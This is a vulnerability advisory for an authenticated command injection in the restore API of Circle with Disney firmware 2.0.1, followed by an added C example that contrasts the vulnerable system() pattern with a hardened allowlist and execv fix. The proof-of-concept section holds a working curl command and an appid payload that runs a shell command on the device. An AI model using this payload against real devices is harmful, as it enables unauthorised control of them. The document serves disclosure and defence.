### Summary
An exploitable OS command injection vulnerability exists in the `/api/CONFIG/restore` functionality of Circle with Disney running firmware 2.0.1. A specially crafted HTTP request causes a user-controlled parameter to be passed unsanitized to `system()`. An attacker can send an HTTP request to trigger this vulnerability.

### Tested Versions
Circle with Disney 2.0.1

### Product URLs
https://meetcircle.com/

### CVSSv3 Score
9.9 – CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

### CWE
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

### Details
The vulnerable code exists in the restore API handler of the `apid` daemon (`/api/CONFIG/restore`), function `sub_417528`:

```
.text:004176A4 loc_4176A4:
.text:004176A4     lw      $v0, (dword_44CB3C - 0x450000)($v0)
.text:004176A8     nop
.text:004176AC     beqz    $v0, loc_4177A8
.text:004176B0     li      $v0, 1
.text:004176B4     beq     $s4, $v0, loc_417860
.text:004176B8     lui     $a0, 0x43
.text:004176BC     jal     strlen
.text:004176C0     addiu   $a0, $s6, (byte_44CC40 - 0x450000)
.text:004176C4     sltiu   $v0, 0x14
.text:004176C8     bnez    $v0, loc_4177A8
.text:004176CC     lui     $v0, 0x45
.text:004176D0     la      $v0, byte_44CC40                 # appid
.text:004176D4     sw      $v0, 0x200+var_1F0($sp)
.text:004176D8     lui     $a2, 0x43
.text:004176DC     li      $v0, 0x42
.text:004176E0     lui     $a3, 0x43
.text:004176E4     addiu   $a0, $sp, 0x200+var_148
.text:004176E8     li      $a1, 0x80
.text:004176EC     la      $a2, aSrestore_backu             # "%srestore_backup.sh /tmp/postfile.bin %s %d"
.text:004176F0     la      $a3, aMntSharesUs_19             # "/mnt/shares/usr/bin/scripts/"
.text:004176F4     jal     snprintf
.text:004176F8     sw      $v0, 0x200+var_1EC($sp)
.text:004176FC     jal     system
.text:00417700     addiu   $a0, $sp, 0x200+var_148
```

Looking at the pseudocode of the whole function, we see the following:

```
if (memcmp(request_url, "/api/CONFIG/restore", 18) == 0)
    if (stat("/mnt/shares/usr/bin/app_list") == 0)
        if (auth_token[0] != 0 && check_token(auth_token))
            if (strlen(appid) >= 20) {
                snprintf(cmd, 128, "%srestore_backup.sh /tmp/postfile.bin %s %d",
                         "/mnt/shares/usr/bin/scripts/", appid, 66);
                system(cmd);
            }
```

As the pseudocode shows, the `appid` parameter, which comes from the user as a multipart form field, is interpolated into the command string and passed directly to `system()` without any sanitization, leading to command injection. The only check applied to it is a minimum length: the `sltiu $v0, 0x14` / `bnez` pair skips the restore when `strlen(appid) < 20`, so an injected payload simply has to be at least 20 bytes long. Because `system()` hands the string to `/bin/sh`, shell metacharacters such as `$(...)`, backticks or `;` inside `appid` are executed as commands. The API requires a valid session token, so the attacker must be an authenticated user (hence PR:L in the vector above).

### Timeline
* 2017-08-29 – Vendor Disclosure
* 2017-10-31 – Public Release
### Exploit Proof of Concept
The following proof of concept shows how to execute the `power_down.sh` script on the device. An attacker needs to use a valid token in order to trigger the vulnerability; `sIP` is the address of the device and `sToken` a valid session token. The `ljust(20, "x")` call pads the payload to the handler's minimum `appid` length of 20 bytes (this particular payload is already longer, so the padding is only a safeguard). An empty file is uploaded to satisfy the multipart request; its contents play no part in the injection.

```
$ sAppid=$(python -c 'print "$(/etc/circle/power_down.sh)".ljust(20, "x")')
$ touch empty
$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "upload=@empty"
```
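The following is an added example, not code from Circle's `apid` or from the advisory: it reproduces the handler's `snprintf` + `system()` pattern as a function that returns the command string `/bin/sh` would receive, and places a hardened replacement beside it. The hardened version validates `appid` against an allowlist and executes the restore script through `fork`/`execv` with an argument vector, so no shell ever parses the parameter. The script directory, the `/tmp/postfile.bin` and `66` arguments and the 20-byte minimum come from the advisory; the allowlist policy, the 64-byte maximum, the function names and the use of `/bin/echo` as a stand-in for `restore_backup.sh` in `main()` are assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

#define SCRIPTS_DIR "/mnt/shares/usr/bin/scripts/"
#define RESTORE_FMT "%srestore_backup.sh /tmp/postfile.bin %s %d"
#define APPID_MIN   20   /* the daemon's own check: sltiu $v0, 0x14 */
#define APPID_MAX   64   /* assumed upper bound; the original has none */

/* Vulnerable pattern, mirroring the decompiled handler: the only check is the
 * minimum length, then appid is interpolated into a shell command line.
 * Returns 0 and fills cmd with what system() would run, or -1 if too short. */
int build_restore_cmd_vulnerable(const char *appid, char *cmd, size_t cmdlen)
{
    if (strlen(appid) < APPID_MIN)
        return -1;
    snprintf(cmd, cmdlen, RESTORE_FMT, SCRIPTS_DIR, appid, 66);
    return 0;
}

/* Hardened step 1: allowlist. Length-bounded and limited to [A-Za-z0-9_-],
 * so $ ( ) ; ` | and whitespace can never reach a command line. */
int appid_is_safe(const char *appid)
{
    size_t n = 0;
    while (n <= APPID_MAX && appid[n] != '\0')   /* bounded strlen */
        n++;
    if (n < APPID_MIN || n > APPID_MAX)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)appid[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Hardened step 2: no shell. Each value becomes exactly one argv entry.
 * Returns argc (4) on success, -1 if appid fails validation. */
int build_restore_argv(const char *appid, const char *script,
                       char *argv[], int maxargs)
{
    if (maxargs < 5 || !appid_is_safe(appid))
        return -1;
    argv[0] = (char *)script;          /* .../restore_backup.sh */
    argv[1] = "/tmp/postfile.bin";
    argv[2] = (char *)appid;           /* passed verbatim, never parsed */
    argv[3] = "66";
    argv[4] = NULL;
    return 4;
}

/* Runs the script directly via fork/execv. Returns the child's exit status,
 * or -1 if validation, fork or waitpid fails (exec failure yields 127). */
int run_restore_safe(const char *appid, const char *script)
{
    char *argv[5];
    if (build_restore_argv(appid, script, argv, 5) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(script, argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: the advisory's PoC appid (28 bytes, over the minimum). */
    const char *evil = "$(/etc/circle/power_down.sh)";
    char cmd[128];

    if (build_restore_cmd_vulnerable(evil, cmd, sizeof cmd) == 0)
        printf("vulnerable handler would run: %s\n", cmd);
    printf("appid_is_safe(evil) = %d\n", appid_is_safe(evil));
    printf("run_restore_safe(evil) = %d\n", run_restore_safe(evil, "/bin/echo"));
    /* /bin/echo stands in for restore_backup.sh so the demo runs anywhere. */
    printf("run_restore_safe(good) = %d\n",
           run_restore_safe("aaaaaaaaaaaaaaaaaaaa", "/bin/echo"));
    return 0;
}
```

The allowlist is deliberately stricter than "reject shell metacharacters": enumerating what is permitted is far less error-prone than enumerating what is dangerous, and it also removes the path-traversal and whitespace cases that a metacharacter blocklist tends to miss. Even with validation in place, `execv` with an argument vector is the change that actually closes the bug class, since the parameter never passes through `/bin/sh` at all.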